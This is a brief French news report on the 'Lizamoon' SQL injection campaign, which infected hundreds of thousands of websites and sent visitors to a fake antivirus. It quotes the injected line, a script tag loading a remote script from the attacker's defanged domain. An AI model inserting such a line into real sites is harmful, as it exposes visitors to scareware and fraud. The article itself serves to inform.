Depuis le 29 mars, des centaines de milliers de sites Internet (on parle d'entre 500.000 et 1 million) ont été infectés par un code malveillant injecté dans leur base de données SQL [une simple ligne de code (<script src=hxxp://lizamoon.com/ur.php></script>)]. L'attaque a été détectée par l'éditeur WebSense, qui lui a donnée le nom de "Lizamoon" (en référence au premier domaine vers lequel les sites infectés amenaient leurs visiteurs pour télécharger un faux antivirus payant).